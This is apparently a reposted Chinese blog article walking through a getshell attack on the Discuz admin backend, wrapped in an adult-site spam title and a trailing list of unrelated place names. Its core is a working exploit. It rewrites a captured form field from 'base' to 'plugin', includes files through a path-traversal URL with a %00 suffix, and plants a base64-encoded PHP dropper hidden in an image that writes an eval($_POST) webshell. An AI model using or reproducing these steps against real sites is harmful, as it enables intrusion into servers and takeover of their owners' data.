中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

discuz 最新后臺getshell的示例分析

發布時間:2021-12-18 09:24:41 來源:億速云 閱讀:299 作者:小新 欄目:安全技術

這篇文章主要介紹了discuz 最新后臺getshell的示例分析,具有一定借鑒價值,感興趣的朋友可以參考下,希望大家閱讀完這篇文章之后大有收獲,下面讓小編帶著大家一起了解一下。

用戶 – 用戶欄目 – 欄目分組 – 提交 – 抓包 (我就是在這步出錯的,一定要提交,不然抓到的數據包不一樣)

1Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

改為

1Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

訪問

1/home.php?mod=spacecp&id=../../robots.txt%0057

本地測試dzx2.5抓包 把base改為下圖中的plugin

discuz 最新后臺getshell的示例分析

測試環境中,上傳的一句話***菜刀連接失敗,最后改為了base64加密

//加密前的內容
<?php @eval(fputs(fopen('./test.php','w+'),'<?php eval($_POST[c]);?>');));?>
//加密后的內容
<?php @eval(base64_decode('ZnB1dHMoZm9wZW4oJy4vdGVzdC5waHAnLCd3KycpLCc8P3BocCBldmFsKCRfUE9TVFtjXSk7Pz4nKTs='));?>

合成圖片***,上傳,

/home.php?mod=spacecp&id=../../圖片馬地址%0057

在當前目錄下生成了test.php,菜刀連接之...

感謝你能夠認真閱讀完這篇文章,希望小編分享的“discuz 最新后臺getshell的示例分析”這篇文章對大家有幫助,同時也希望大家多多支持億速云,關注億速云行業資訊頻道,更多相關知識等著你來學習!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

互助| 杭州市| 科技| 宁津县| 呈贡县| 潞西市| 恩施市| 高邮市| 乡宁县| 陆河县| 嵊州市| 盐池县| 秭归县| 搜索| 花垣县| 威宁| 鄂尔多斯市| 桦南县| 东兴市| 通海县| 太谷县| 海伦市| 全南县| 贵港市| 南华县| 凤庆县| 和顺县| 迁西县| 尼木县| 垫江县| 广丰县| 临海市| 睢宁县| 沁源县| 江华| 丰都县| 饶平县| 耒阳市| 金湖县| 米脂县| 云梦县|